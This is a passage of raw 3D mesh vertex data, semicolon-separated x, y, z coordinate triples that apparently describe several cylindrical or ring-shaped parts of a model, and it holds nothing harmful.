-0.256377;0.672530;-1.247960;, -0.254643;0.674236;-1.247950;, -0.236109;0.674236;-1.253760;, -0.244957;0.674236;-1.251470;, -0.251467;0.674236;-1.251190;, -0.239397;0.674236;-1.245590;, -0.236981;0.674236;-1.239540;, -0.229010;0.669135;-1.263040;, -0.225648;0.594800;-1.260310;, -0.223807;0.594800;-1.256760;, -0.222917;0.594790;-1.253150;, -0.222836;0.594790;-1.248910;, -0.224400;0.594776;-1.244480;, -0.228068;0.594776;-1.238850;, -0.231576;0.594790;-1.235620;, -0.235711;0.594790;-1.233940;, -0.239421;0.594802;-1.233300;, -0.243270;0.594802;-1.233600;, -0.247010;0.594799;-1.235000;, -0.251405;0.594799;-1.237840;, -0.254215;0.594802;-1.240680;, -0.256070;0.594802;-1.244060;, -0.257008;0.594790;-1.247710;, -0.257171;0.594790;-1.252170;, -0.255662;0.594776;-1.256690;, -0.252030;0.594776;-1.262350;, -0.248634;0.594790;-1.265590;, -0.244738;0.594790;-1.267250;, -0.241070;0.594800;-1.267930;, -0.237089;0.594800;-1.267700;, -0.259183;0.594790;-1.252460;, -0.257480;0.594774;-1.257560;, -0.253584;0.594774;-1.263630;, -0.249753;0.594790;-1.267290;, -0.245318;0.594790;-1.269180;, -0.241196;0.594801;-1.269940;, -0.236679;0.594801;-1.269680;, -0.232292;0.594795;-1.268070;, -0.227273;0.594795;-1.264840;, -0.224009;0.594801;-1.261490;, -0.221922;0.594801;-1.257470;, -0.220921;0.594790;-1.253410;, -0.220829;0.594790;-1.248590;, -0.222594;0.594774;-1.243590;, -0.226529;0.594774;-1.237550;, -0.230488;0.594790;-1.233900;, -0.235158;0.594790;-1.232010;, -0.239327;0.594803;-1.231280;, -0.243708;0.594803;-1.231620;, -0.247914;0.594800;-1.233200;, -0.252674;0.594800;-1.236280;, -0.255834;0.594803;-1.239480;, -0.257944;0.594803;-1.243320;, -0.258999;0.594790;-1.247420;, -0.202621;0.594790;-1.145560;, -0.193565;0.594793;-1.160160;, -0.206074;0.594790;-1.148380;, -0.198507;0.621362;-1.142050;, -0.198505;0.596789;-1.142050;, -0.203604;0.596823;-1.143780;, -0.203605;0.621378;-1.143780;, -0.207507;0.596802;-1.146970;, -0.207507;0.621378;-1.146970;, -0.210129;0.596818;-1.150290;, -0.210129;0.621391;-1.150290;, -0.211926;0.596823;-1.154300;, -0.211925;0.621391;-1.154300;, -0.212557;0.596812;-1.158750;, -0.212555;0.621388;-1.158750;, -0.212129;0.596812;-1.164400;, -0.212127;0.621388;-1.164400;, -0.210838;0.596823;-1.168700;, -0.210836;0.621391;-1.168700;, -0.208461;0.596819;-1.172400;, -0.208461;0.621391;-1.172400;, -0.205367;0.596801;-1.175280;, -0.205368;0.621378;-1.175280;, -0.201028;0.596823;-1.177860;, -0.201029;0.621378;-1.177860;, -0.195730;0.596789;-1.178800;, -0.195731;0.621362;-1.178800;, -0.188548;0.596788;-1.178280;, -0.188543;0.621362;-1.178280;, -0.183502;0.596823;-1.176670;, -0.183497;0.621378;-1.176670;, -0.179717;0.596802;-1.173680;, -0.179713;0.621378;-1.173680;, -0.177080;0.596815;-1.170420;, -0.177077;0.621389;-1.170420;, -0.175139;0.596823;-1.166330;, -0.175138;0.621389;-1.166330;, -0.174457;0.596807;-1.161710;, -0.174455;0.621383;-1.161710;, -0.174905;0.596807;-1.155750;, -0.174903;0.621383;-1.155750;, -0.176276;0.596823;-1.151280;, -0.176276;0.621389;-1.151280;, -0.178810;0.596815;-1.147530;, -0.178807;0.621389;-1.147530;, -0.181905;0.596802;-1.144710;, -0.181901;0.621378;-1.144710;, -0.186096;0.596823;-1.142320;, -0.186091;0.621378;-1.142320;, -0.191328;0.596788;-1.141480;, -0.191323;0.621362;-1.141480;, -0.182732;0.674236;-1.170460;, -0.185844;0.674236;-1.172920;, -0.184820;0.672532;-1.174320;, -0.181706;0.672532;-1.171860;, -0.207831;0.674236;-1.163570;, -0.208184;0.674236;-1.158920;, -0.209912;0.672541;-1.159050;, -0.209560;0.672541;-1.163700;, -0.187850;0.674236;-1.146380;, -0.184402;0.674236;-1.148340;, -0.183600;0.672532;-1.146800;, -0.187046;0.672532;-1.144840;, -0.180804;0.672543;-1.149360;, -0.180682;0.669166;-1.149220;, -0.183477;0.669157;-1.146670;, -0.209343;0.672544;-1.155040;, -0.209521;0.669154;-1.155010;, -0.210090;0.669150;-1.159020;, -0.189379;0.672515;-1.175780;, -0.189311;0.669077;-1.175950;, -0.184754;0.669095;-1.174490;, -0.187006;0.669095;-1.144660;, -0.183035;0.652105;-1.145900;, -0.186564;0.652044;-1.143890;, -0.209732;0.669150;-1.163760;, -0.210957;0.652098;-1.159090;, -0.210600;0.652098;-1.163830;, -0.181566;0.669157;-1.171970;, -0.184200;0.652044;-1.175180;, -0.181014;0.652105;-1.172670;, -0.208394;0.672544;-1.167590;, -0.206929;0.674236;-1.166660;, -0.191795;0.652026;-1.143050;, -0.191733;0.669077;-1.143900;, -0.209311;0.652103;-1.168130;, -0.208565;0.669154;-1.167640;, -0.178379;0.652115;-1.169410;, -0.179183;0.669166;-1.169030;, -0.185377;0.674236;-1.168360;, -0.187090;0.674236;-1.169710;, -0.204612;0.674236;-1.162490;, -0.204840;0.674236;-1.159510;, -0.188598;0.674236;-1.149740;, -0.186702;0.674236;-1.150820;, -0.176438;0.652084;-1.156350;, -0.176060;0.652084;-1.161350;, -0.200567;0.652036;-1.176290;, -0.204216;0.652103;-1.174130;, -0.207308;0.652115;-1.171240;, -0.176748;0.652091;-1.165970;, -0.183550;0.674236;-1.166090;, -0.189513;0.674236;-1.163250;, -0.203709;0.674236;-1.165580;, -0.198197;0.674236;-1.162010;, -0.192380;0.674236;-1.149170;, -0.191923;0.674236;-1.155410;, -0.207754;0.674236;-1.155730;, -0.188622;0.674236;-1.161370;, -0.182659;0.674236;-1.164220;, -0.197114;0.674236;-1.163690;, -0.202627;0.674236;-1.167270;, -0.195795;0.674236;-1.155710;, -0.196253;0.674236;-1.149480;, -0.180904;0.674236;-1.168200;, -0.191631;0.674236;-1.145810;, -0.197812;0.652019;-1.143530;, -0.202911;0.652036;-1.145260;, -0.195266;0.652019;-1.177230;, -0.206194;0.652103;-1.147950;, -0.208817;0.652115;-1.151260;, -0.177810;0.652091;-1.151880;, -0.184556;0.674236;-1.152780;, -0.182256;0.674236;-1.150300;, -0.204411;0.674236;-1.156310;, -0.190744;0.674236;-1.170840;, -0.189498;0.674236;-1.174050;, -0.190024;0.674236;-1.156490;, -0.198421;0.674236;-1.159020;, -0.191228;0.674236;-1.164610;, -0.203647;0.672530;-1.173240;, -0.202819;0.674236;-1.171710;, -0.204974;0.674236;-1.169700;, -0.206440;0.672544;-1.170630;, -0.177112;0.672536;-1.161380;, -0.178843;0.674236;-1.161510;, -0.179310;0.674236;-1.164840;, -0.177732;0.672543;-1.165550;, -0.177554;0.669142;-1.165590;, -0.179325;0.672543;-1.168920;, -0.206565;0.669166;-1.170760;, -0.197750;0.669071;-1.144380;, -0.197683;0.672515;-1.144550;, -0.191772;0.672515;-1.144080;, -0.210328;0.652103;-1.154640;, -0.183393;0.674236;-1.154510;, -0.180177;0.674236;-1.153390;, -0.203591;0.674236;-1.154480;, -0.206280;0.674236;-1.152430;, -0.194618;0.674236;-1.171120;, -0.195410;0.674236;-1.174480;, -0.176935;0.669135;-1.161410;, -0.203771;0.669154;-1.173370;, -0.202355;0.669086;-1.145940;, -0.207867;0.672544;-1.151740;, -0.204450;0.674236;-1.150120;, -0.205498;0.672530;-1.148740;, -0.178724;0.672543;-1.152440;, -0.195289;0.672515;-1.176210;, -0.197540;0.674236;-1.146270;, -0.182430;0.674236;-1.157730;, -0.179213;0.674236;-1.156610;, -0.205639;0.669154;-1.148630;, -0.208009;0.669166;-1.151630;, -0.200077;0.672530;-1.175350;, -0.200120;0.669086;-1.175530;, -0.195331;0.669071;-1.176390;, -0.178551;0.669142;-1.152380;, -0.179941;0.652115;-1.148730;, -0.189245;0.652026;-1.176800;, -0.199251;0.674236;-1.173830;, -0.177483;0.672536;-1.156480;, -0.182191;0.674236;-1.160890;, -0.200471;0.674236;-1.169280;, -0.199955;0.674236;-1.150700;, -0.202288;0.672530;-1.146110;, -0.201242;0.674236;-1.147490;, -0.188861;0.674236;-1.158210;, -0.195101;0.674236;-1.164890;, -0.198460;0.674236;-1.170470;, -0.197603;0.674236;-1.157190;, -0.201764;0.674236;-1.152180;, -0.177312;0.669135;-1.156420;, -0.208407;0.594802;-1.151330;, -0.209985;0.594802;-1.154860;, -0.210546;0.594799;-1.158820;, -0.210151;0.594799;-1.164030;, -0.209003;0.594802;-1.167860;, -0.206916;0.594802;-1.171110;, -0.204164;0.594790;-1.173670;, -0.200322;0.594790;-1.175950;, -0.195629;0.594776;-1.176790;, -0.188926;0.594776;-1.176300;, -0.184454;0.594790;-1.174880;, -0.181130;0.594790;-1.172250;, -0.178784;0.594800;-1.169350;, -0.177075;0.594800;-1.165740;, -0.176468;0.594795;-1.161640;, -0.176883;0.594795;-1.156120;, -0.178101;0.594800;-1.152150;, -0.180332;0.594800;-1.148850;, -0.183086;0.594790;-1.146340;, -0.186769;0.594790;-1.144240;, -0.191406;0.594776;-1.143490;, -0.198101;0.594776;-1.144020;, -0.212129;0.594800;-1.164400;, -0.210838;0.594803;-1.168700;, -0.208463;0.594803;-1.172400;, -0.205370;0.594790;-1.175280;, -0.201031;0.594790;-1.177860;, -0.195733;0.594774;-1.178800;, -0.188545;0.594774;-1.178280;, -0.183499;0.594790;-1.176670;, -0.179715;0.594790;-1.173680;, -0.177079;0.594801;-1.170420;, -0.175140;0.594801;-1.166330;, -0.174457;0.594795;-1.161710;, -0.174905;0.594795;-1.155750;, -0.176277;0.594801;-1.151280;, -0.178808;0.594801;-1.147530;, -0.181903;0.594790;-1.144710;, -0.186093;0.594790;-1.142320;, -0.191325;0.594774;-1.141480;, -0.198508;0.594774;-1.142050;, -0.203607;0.594790;-1.143780;, -0.207509;0.594790;-1.146970;, -0.210131;0.594803;-1.150290;, -0.211926;0.594803;-1.154300;, -0.212557;0.594800;-1.158750;, -0.233251;0.594795;-1.066630;, -0.243692;0.594793;-1.080250;, -0.238125;0.594795;-1.064020;, -0.228580;0.621389;-1.068030;, -0.228581;0.596823;-1.068030;, -0.232111;0.596807;-1.064970;, -0.232109;0.621383;-1.064970;, -0.237376;0.596807;-1.062150;, -0.237377;0.621383;-1.062140;, -0.241881;0.596823;-1.060900;, -0.241881;0.621389;-1.060900;, -0.246409;0.596815;-1.061020;, -0.246405;0.621389;-1.061020;, -0.250453;0.596802;-1.062110;, -0.250450;0.621378;-1.062110;, -0.254718;0.596823;-1.064360;, -0.254715;0.621378;-1.064360;, -0.258237;0.596788;-1.068320;, -0.258234;0.621362;-1.068320;, -0.261618;0.596790;-1.074680;, -0.261619;0.621362;-1.074680;, -0.262901;0.596823;-1.079910;, -0.262900;0.621378;-1.079910;, -0.262308;0.596802;-1.084920;, -0.262306;0.621378;-1.084920;, -0.260918;0.596819;-1.088920;, -0.260916;0.621391;-1.088910;, -0.258497;0.596822;-1.092580;, -0.258498;0.621391;-1.092580;, -0.255087;0.596812;-1.095510;, -0.255087;0.621388;-1.095510;, -0.250093;0.596811;-1.098180;, -0.250092;0.621388;-1.098180;, -0.245772;0.596823;-1.099410;, -0.245770;0.621391;-1.099410;, -0.241372;0.596819;-1.099390;, -0.241374;0.621391;-1.099390;, -0.237277;0.596801;-1.098330;, -0.237279;0.621378;-1.098330;, -0.232778;0.596823;-1.096060;, -0.232779;0.621378;-1.096060;, -0.229131;0.596790;-1.092100;, -0.229133;0.621362;-1.092100;, -0.225709;0.596788;-1.085760;, -0.225707;0.621362;-1.085760;, -0.224358;0.596823;-1.080640;, -0.224357;0.621378;-1.080630;, -0.224842;0.596802;-1.075840;, -0.224842;0.621378;-1.075840;, -0.226174;0.596815;-1.071860;, -0.226174;0.621389;-1.071860;, -0.229180;0.674236;-1.076660;, -0.228778;0.674236;-1.080600;, -0.227048;0.672532;-1.080490;, -0.227448;0.672532;-1.076540;, -0.248481;0.674236;-1.094120;, -0.252591;0.674236;-1.091910;, -0.253411;0.672541;-1.093440;, -0.249300;0.672541;-1.095640;, -0.252237;0.674236;-1.068020;, -0.248730;0.674236;-1.066170;, -0.249597;0.672532;-1.064670;, -0.253103;0.672532;-1.066520;, -0.245940;0.672543;-1.063680;, -0.245984;0.669166;-1.063510;, -0.249641;0.669157;-1.064490;, -0.256490;0.672544;-1.090800;, -0.256612;0.669154;-1.090930;, -0.253531;0.669150;-1.093570;, -0.228266;0.672515;-1.085120;, -0.228087;0.669077;-1.085150;, -0.226868;0.669095;-1.080520;, -0.253233;0.669095;-1.066390;, -0.250052;0.652105;-1.063710;, -0.253644;0.652044;-1.065600;, -0.249345;0.669150;-1.095820;, -0.253942;0.652098;-1.094340;, -0.249754;0.652098;-1.096590;, -0.227277;0.669157;-1.076480;, -0.225986;0.652044;-1.080430;, -0.226395;0.652105;-1.076390;, -0.228651;0.672543;-1.072950;, -0.230104;0.674236;-1.073900;, -0.256283;0.672515;-1.070100;, -0.254750;0.674236;-1.070910;, -0.257163;0.652026;-1.069560;, -0.256412;0.669077;-1.069970;, -0.245435;0.652103;-1.097810;, -0.245440;0.669154;-1.096920;, -0.227725;0.652115;-1.072420;, -0.228480;0.669166;-1.072890;, -0.232376;0.674236;-1.077750;, -0.232158;0.674236;-1.079920;, -0.247660;0.674236;-1.090820;, -0.250302;0.674236;-1.089410;, -0.249807;0.674236;-1.070460;, -0.247875;0.674236;-1.069440;, -0.260777;0.652103;-1.084340;, -0.261278;0.652036;-1.080120;, -0.259997;0.652019;-1.074890;, -0.233303;0.674236;-1.074990;, -0.238903;0.674236;-1.078500;, -0.244567;0.674236;-1.091720;, -0.244619;0.674236;-1.085150;, -0.252318;0.674236;-1.073350;, -0.246813;0.674236;-1.076310;, -0.245922;0.674236;-1.065420;, -0.229791;0.674236;-1.084290;, -0.240008;0.674236;-1.076740;, -0.234407;0.674236;-1.073230;, -0.242615;0.674236;-1.085140;, -0.242565;0.674236;-1.091710;, -0.248639;0.674236;-1.079740;, -0.254142;0.674236;-1.076770;, -0.245389;0.674236;-1.095020;, -0.229750;0.652091;-1.069190;, -0.233279;0.652084;-1.066130;, -0.241733;0.652115;-1.097790;, -0.237638;0.652103;-1.096740;, -0.233851;0.652036;-1.094830;, -0.230206;0.652019;-1.090860;, -0.259390;0.652115;-1.088330;, -0.237694;0.652084;-1.063760;, -0.242199;0.652091;-1.062520;, -0.245065;0.674236;-1.068690;, -0.252762;0.674236;-1.087330;, -0.255051;0.674236;-1.089830;, -0.233168;0.674236;-1.083610;, -0.244883;0.674236;-1.075290;, -0.247261;0.674236;-1.083730;, -0.238684;0.674236;-1.080670;, -0.260224;0.672530;-1.080050;, -0.258496;0.674236;-1.079920;, -0.257535;0.674236;-1.076140;, -0.259067;0.672515;-1.075330;, -0.230505;0.669142;-1.069670;, -0.230629;0.672543;-1.069800;, -0.241740;0.669166;-1.096910;, -0.241782;0.672544;-1.096740;, -0.245396;0.672544;-1.096750;, -0.259247;0.669071;-1.075300;, -0.246005;0.652115;-1.062620;, -0.227335;0.652026;-1.085550;, -0.248364;0.674236;-1.082060;, -0.240530;0.674236;-1.084090;, -0.242805;0.674236;-1.075240;, -0.242989;0.674236;-1.068630;, -0.242201;0.674236;-1.065320;, -0.253864;0.674236;-1.085660;, -0.257040;0.674236;-1.086820;, -0.235013;0.674236;-1.087030;, -0.232608;0.674236;-1.089500;, -0.233693;0.669135;-1.066900;, -0.238039;0.669154;-1.095960;, -0.260404;0.669086;-1.080020;, -0.242219;0.672543;-1.063580;, -0.238968;0.674236;-1.066240;, -0.238152;0.672536;-1.064710;, -0.231084;0.672515;-1.090330;, -0.235221;0.674236;-1.092390;, -0.234378;0.672530;-1.093910;, -0.258479;0.672544;-1.087780;, -0.241774;0.674236;-1.095000;, -0.239756;0.674236;-1.069550;, -0.259733;0.672530;-1.084170;, -0.259905;0.669154;-1.084230;, -0.258648;0.669166;-1.087840;, -0.234251;0.669086;-1.094040;, -0.230957;0.669071;-1.090460;, -0.242177;0.669142;-1.063410;, -0.257354;0.652103;-1.091420;, -0.258006;0.674236;-1.084030;, -0.232084;0.674236;-1.070750;, -0.236960;0.674236;-1.071050;, -0.239713;0.674236;-1.090980;, -0.255104;0.674236;-1.080550;, -0.233818;0.672536;-1.067030;, -0.234637;0.674236;-1.068560;, -0.238082;0.672530;-1.095780;, -0.238923;0.674236;-1.094260;, -0.237626;0.674236;-1.089920;, -0.254829;0.674236;-1.082870;, -0.238108;0.669135;-1.064530;, -0.242128;0.594800;-1.062910;, -0.246115;0.594800;-1.063010;, -0.249715;0.594790;-1.063980;, -0.253462;0.594790;-1.065960;, -0.256581;0.594776;-1.069470;, -0.259736;0.594776;-1.075400;, -0.260872;0.594790;-1.080030;, -0.260346;0.594790;-1.084470;, -0.259110;0.594802;-1.088030;, -0.256983;0.594802;-1.091240;, -0.253951;0.594799;-1.093850;, -0.249338;0.594799;-1.096320;, -0.245496;0.594802;-1.097410;, -0.241634;0.594802;-1.097390;, -0.237989;0.594790;-1.096450;, -0.234005;0.594790;-1.094440;, -0.230774;0.594776;-1.090930;, -0.227581;0.594776;-1.085020;, -0.226384;0.594790;-1.080480;, -0.226810;0.594790;-1.076260;, -0.227996;0.594800;-1.072720;, -0.230115;0.594800;-1.069350;, -0.255088;0.594800;-1.095510;, -0.250092;0.594800;-1.098180;, -0.245771;0.594803;-1.099410;, -0.241375;0.594803;-1.099390;, -0.237280;0.594790;-1.098330;, -0.232780;0.594790;-1.096060;, -0.229133;0.594774;-1.092100;, -0.225708;0.594774;-1.085760;, -0.224358;0.594790;-1.080640;, -0.224843;0.594790;-1.075840;, -0.226175;0.594801;-1.071860;, -0.228580;0.594801;-1.068030;, -0.232110;0.594795;-1.064970;, -0.237377;0.594795;-1.062150;, -0.241882;0.594801;-1.060900;, -0.246406;0.594801;-1.061020;, -0.250451;0.594790;-1.062110;, -0.254716;0.594790;-1.064360;, -0.258235;0.594774;-1.068320;, -0.261619;0.594774;-1.074680;, -0.262901;0.594790;-1.079910;, -0.262307;0.594790;-1.084920;, -0.260917;0.594803;-1.088920;, -0.258498;0.594803;-1.092580;, -0.367966;0.594795;-1.258220;, -0.355553;0.594793;-1.246360;, -0.363552;0.594795;-1.261540;, -0.364578;0.621383;-1.263280;, -0.364579;0.596807;-1.263270;, -0.360320;0.596823;-1.265200;, -0.360319;0.621389;-1.265210;, -0.369350;0.621383;-1.259680;, -0.369348;0.596808;-1.259680;, -0.372363;0.621389;-1.256110;, -0.372361;0.596823;-1.256110;, -0.374153;0.621389;-1.251960;, -0.374153;0.596815;-1.251940;, -0.374857;0.621378;-1.247820;, -0.374856;0.596802;-1.247820;, -0.374599;0.621378;-1.243010;, -0.374597;0.596823;-1.243000;, -0.372477;0.621362;-1.238150;, -0.372474;0.596788;-1.238150;, -0.368115;0.621362;-1.232410;, -0.368116;0.596790;-1.232410;, -0.363902;0.621378;-1.229060;, -0.363903;0.596823;-1.229060;, -0.359106;0.621378;-1.227510;, -0.359108;0.596802;-1.227510;, -0.354896;0.621391;-1.227090;, -0.354898;0.596819;-1.227090;, -0.350551;0.621391;-1.227750;, -0.350550;0.596823;-1.227750;, -0.346470;0.621388;-1.229630;, -0.346469;0.596812;-1.229630;, -0.341946;0.621388;-1.233040;, -0.341945;0.596812;-1.233040;, -0.339025;0.621391;-1.236460;, -0.339025;0.596823;-1.236460;, -0.337200;0.621391;-1.240460;, -0.337198;0.596819;-1.240450;, -0.336445;0.621378;-1.244610;, -0.336444;0.596802;-1.244610;, -0.336626;0.621378;-1.249650;, -0.336626;0.596823;-1.249650;, -0.338695;0.621362;-1.254630;, -0.338696;0.596790;-1.254620;, -0.343020;0.621362;-1.260380;, -0.343017;0.596788;-1.260380;, -0.347107;0.621378;-1.263760;, -0.347104;0.596823;-1.263760;, -0.351667;0.621378;-1.265330;, -0.351664;0.596802;-1.265320;, -0.355834;0.621389;-1.265780;, -0.355830;0.596815;-1.265780;, -0.352118;0.672532;-1.262670;, -0.348367;0.672532;-1.261380;, -0.348990;0.674236;-1.259760;, -0.352740;0.674236;-1.261050;, -0.343922;0.672541;-1.234830;, -0.347641;0.672541;-1.232020;, -0.348687;0.674236;-1.233400;, -0.344965;0.674236;-1.236210;, -0.371963;0.672532;-1.243560;, -0.372173;0.672532;-1.247520;, -0.370445;0.674236;-1.247690;, -0.370233;0.674236;-1.243720;, -0.372352;0.669157;-1.247560;, -0.371716;0.669166;-1.251290;, -0.371537;0.672543;-1.251260;, -0.347572;0.669150;-1.231850;, -0.351258;0.669154;-1.230160;, -0.351330;0.672544;-1.230320;, -0.348258;0.669095;-1.261520;, -0.344566;0.669077;-1.258480;, -0.344674;0.672515;-1.258340;, -0.373021;0.652044;-1.243450;, -0.373238;0.652105;-1.247520;, -0.372133;0.669095;-1.243500;, -0.343256;0.652098;-1.234010;, -0.347048;0.652098;-1.231150;, -0.343781;0.669150;-1.234710;, -0.351815;0.652105;-1.263690;, -0.347974;0.652044;-1.262360;, -0.352099;0.669157;-1.262850;, -0.355633;0.674236;-1.261360;, -0.355881;0.672543;-1.263080;, -0.368668;0.674236;-1.240230;, -0.370045;0.672515;-1.239180;, -0.370217;0.669077;-1.239120;, -0.370898;0.652026;-1.238610;, -0.341143;0.669154;-1.237790;, -0.340337;0.652103;-1.237430;, -0.355864;0.669166;-1.263260;, -0.355981;0.652115;-1.264140;, -0.351016;0.674236;-1.256980;, -0.353083;0.674236;-1.257680;, -0.350005;0.674236;-1.236520;, -0.347614;0.674236;-1.238330;, -0.367118;0.674236;-1.247090;, -0.367000;0.674236;-1.244910;, -0.363033;0.652036;-1.230450;, -0.358995;0.652103;-1.229130;, -0.367246;0.652019;-1.233800;, -0.355139;0.674236;-1.251450;, -0.355975;0.674236;-1.258000;, -0.351491;0.674236;-1.243470;, -0.345501;0.674236;-1.240770;, -0.360437;0.674236;-1.245170;, -0.365435;0.674236;-1.241420;, -0.369955;0.674236;-1.250550;, -0.346065;0.674236;-1.257290;, -0.358036;0.674236;-1.257730;, -0.357200;0.674236;-1.251180;, -0.344671;0.674236;-1.242590;, -0.350660;0.674236;-1.245300;, -0.363084;0.674236;-1.238320;, -0.358085;0.674236;-1.242090;, -0.342854;0.674236;-1.238640;, -0.364016;0.652084;-1.261730;, -0.359759;0.652091;-1.263650;, -0.338042;0.652103;-1.244950;, -0.338800;0.652115;-1.240790;, -0.340266;0.652019;-1.254170;, -0.338193;0.652036;-1.249190;, -0.354787;0.652115;-1.228730;, -0.371031;0.652091;-1.255140;, -0.368014;0.652084;-1.258720;, -0.366628;0.674236;-1.249950;, -0.351604;0.674236;-1.232030;, -0.352923;0.674236;-1.235160;, -0.348091;0.674236;-1.254510;, -0.360554;0.674236;-1.247360;, -0.353882;0.674236;-1.241660;, -0.353074;0.674236;-1.250740;, -0.366458;0.672515;-1.234460;, -0.365081;0.674236;-1.235510;, -0.362053;0.674236;-1.233060;, -0.362652;0.672530;-1.231430;, -0.359572;0.672543;-1.262600;, -0.359642;0.669142;-1.262770;, -0.341284;0.672544;-1.237910;, -0.339782;0.672544;-1.241190;, -0.339605;0.669166;-1.241160;, -0.366564;0.669071;-1.234310;, -0.372535;0.652115;-1.251640;, -0.343886;0.652026;-1.259000;, -0.368484;0.674236;-1.253960;, -0.365806;0.674236;-1.251860;, -0.355178;0.674236;-1.231490;, -0.354901;0.674236;-1.234870;, -0.342508;0.674236;-1.252560;, -0.345761;0.674236;-1.251410;, -0.363489;0.669135;-1.261030;, -0.338922;0.669154;-1.244920;, -0.362758;0.669086;-1.231290;, -0.367345;0.672536;-1.257900;, -0.366299;0.674236;-1.256520;, -0.370068;0.672543;-1.254680;, -0.339247;0.672530;-1.249090;, -0.340978;0.674236;-1.248970;, -0.341116;0.672515;-1.253590;, -0.354902;0.672544;-1.229780;, -0.341353;0.674236;-1.241920;, -0.363619;0.674236;-1.254420;, -0.354918;0.669166;-1.229600;, -0.358722;0.669154;-1.229970;, -0.358707;0.672530;-1.230150;, -0.340945;0.669071;-1.253650;, -0.339076;0.669086;-1.249160;, -0.370211;0.669142;-1.254790;, -0.351129;0.652103;-1.229280;, -0.358107;0.674236;-1.231780;, -0.359324;0.674236;-1.260880;, -0.361089;0.674236;-1.256330;, -0.344146;0.674236;-1.245490;, -0.360055;0.674236;-1.235870;, -0.362375;0.674236;-1.259480;, -0.363419;0.672536;-1.260870;, -0.340827;0.674236;-1.244820;, -0.339098;0.672530;-1.244960;, -0.359733;0.674236;-1.249270;, -0.344229;0.674236;-1.247820;, -0.350743;0.674236;-1.247630;, -0.357833;0.674236;-1.235150;, -0.355862;0.674236;-1.241360;, -0.367486;0.669135;-1.258020;, -0.359767;0.594800;-1.263250;, -0.355813;0.594800;-1.263760;, -0.352105;0.594790;-1.263360;, -0.348099;0.594790;-1.261990;, -0.344477;0.594776;-1.258990;, -0.340445;0.594776;-1.253620;, -0.338611;0.594790;-1.249220;, -0.338450;0.594790;-1.244750;, -0.339122;0.594802;-1.241050;, -0.340727;0.594802;-1.237540;, -0.343323;0.594799;-1.234500;, -0.347501;0.594799;-1.231350;, -0.351129;0.594802;-1.229680;, -0.354946;0.594802;-1.229100;, -0.358694;0.594790;-1.229480;, -0.362940;0.594790;-1.230850;, -0.366673;0.594776;-1.233820;, -0.370739;0.594776;-1.239170;, -0.372620;0.594790;-1.243480;, -0.372846;0.594790;-1.247700;, -0.372220;0.594800;-1.251370;, -0.370642;0.594800;-1.255050;, -0.341945;0.594800;-1.233040;, -0.346469;0.594800;-1.229630;, -0.350550;0.594803;-1.227750;, -0.354895;0.594803;-1.227090;, -0.359105;0.594790;-1.227510;, -0.363901;0.594790;-1.229060;, -0.368114;0.594774;-1.232410;, -0.372476;0.594774;-1.238150;, -0.374598;0.594790;-1.243010;, -0.374856;0.594790;-1.247820;, -0.374152;0.594801;-1.251950;, -0.372362;0.594801;-1.256110;, -0.369349;0.594795;-1.259680;, -0.364578;0.594795;-1.263270;, -0.360319;0.594801;-1.265200;, -0.355833;0.594801;-1.265780;, -0.351667;0.594790;-1.265320;, -0.347106;0.594790;-1.263760;, -0.343019;0.594774;-1.260380;, -0.338695;0.594774;-1.254620;, -0.336625;0.594790;-1.249650;, -0.336444;0.594790;-1.244610;, -0.337199;0.594803;-1.240450;, -0.339024;0.594803;-1.236460;, -0.383202;0.594790;-1.148380;, -0.395712;0.594793;-1.160160;, -0.386654;0.594790;-1.145560;, -0.385671;0.621378;-1.143780;, -0.385672;0.596823;-1.143780;, -0.390771;0.596789;-1.142050;, -0.390769;0.621362;-1.142050;, -0.381769;0.621378;-1.146970;, -0.381769;0.596802;-1.146970;, -0.379147;0.621391;-1.150290;, -0.379147;0.596818;-1.150290;, -0.377351;0.621391;-1.154300;, -0.377350;0.596823;-1.154300;, -0.376721;0.621388;-1.158750;, -0.376719;0.596812;-1.158750;, -0.377149;0.621388;-1.164400;, -0.377147;0.596812;-1.164400;, -0.378440;0.621391;-1.168700;, -0.378438;0.596823;-1.168700;, -0.380815;0.621391;-1.172400;, -0.380815;0.596819;-1.172400;, -0.383908;0.621378;-1.175280;, -0.383909;0.596801;-1.175280;, -0.388247;0.621378;-1.177860;, -0.388248;0.596823;-1.177860;, -0.393545;0.621362;-1.178800;, -0.393546;0.596789;-1.178800;, -0.400733;0.621362;-1.178280;, -0.400728;0.596788;-1.178280;, -0.405779;0.621378;-1.176670;, -0.405774;0.596823;-1.176670;, -0.409563;0.621378;-1.173680;, -0.409559;0.596802;-1.173680;, -0.412199;0.621389;-1.170420;, -0.412196;0.596815;-1.170420;, -0.414138;0.621389;-1.166330;, -0.414136;0.596823;-1.166330;, -0.414821;0.621383;-1.161710;, -0.414819;0.596807;-1.161710;, -0.414373;0.621383;-1.155750;, -0.414371;0.596807;-1.155750;, -0.413000;0.621389;-1.151280;, -0.413000;0.596823;-1.151280;, -0.410469;0.621389;-1.147530;, -0.410466;0.596815;-1.147530;, -0.407375;0.621378;-1.144710;, -0.407371;0.596802;-1.144710;, -0.403185;0.621378;-1.142320;, -0.403180;0.596823;-1.142320;, -0.397953;0.621362;-1.141480;, -0.397948;0.596788;-1.141480;, -0.407570;0.672532;-1.171860;, -0.404456;0.672532;-1.174320;, -0.403432;0.674236;-1.172920;, -0.406544;0.674236;-1.170460;, -0.379716;0.672541;-1.163700;, -0.379364;0.672541;-1.159050;, -0.381092;0.674236;-1.158920;, -0.381445;0.674236;-1.163570;, -0.402230;0.672532;-1.144840;, -0.405676;0.672532;-1.146800;, -0.404874;0.674236;-1.148340;, -0.401426;0.674236;-1.146380;, -0.405799;0.669157;-1.146670;, -0.408594;0.669166;-1.149220;, -0.408472;0.672543;-1.149360;, -0.379186;0.669150;-1.159020;, -0.379755;0.669154;-1.155010;, -0.379933;0.672544;-1.155040;, -0.404522;0.669095;-1.174490;, -0.399965;0.669077;-1.175950;, -0.399897;0.672515;-1.175780;, -0.402712;0.652044;-1.143890;, -0.406241;0.652105;-1.145900;, -0.402270;0.669095;-1.144660;, -0.378676;0.652098;-1.163830;, -0.378319;0.652098;-1.159090;, -0.379544;0.669150;-1.163760;, -0.408262;0.652105;-1.172670;, -0.405076;0.652044;-1.175180;, -0.407710;0.669157;-1.171970;, -0.382347;0.674236;-1.166660;, -0.380882;0.672544;-1.167590;, -0.397543;0.669077;-1.143900;, -0.397481;0.652026;-1.143050;, -0.380711;0.669154;-1.167640;, -0.379965;0.652103;-1.168130;, -0.410093;0.669166;-1.169030;, -0.410897;0.652115;-1.169410;, -0.402186;0.674236;-1.169710;, -0.403899;0.674236;-1.168360;, -0.384436;0.674236;-1.159510;, 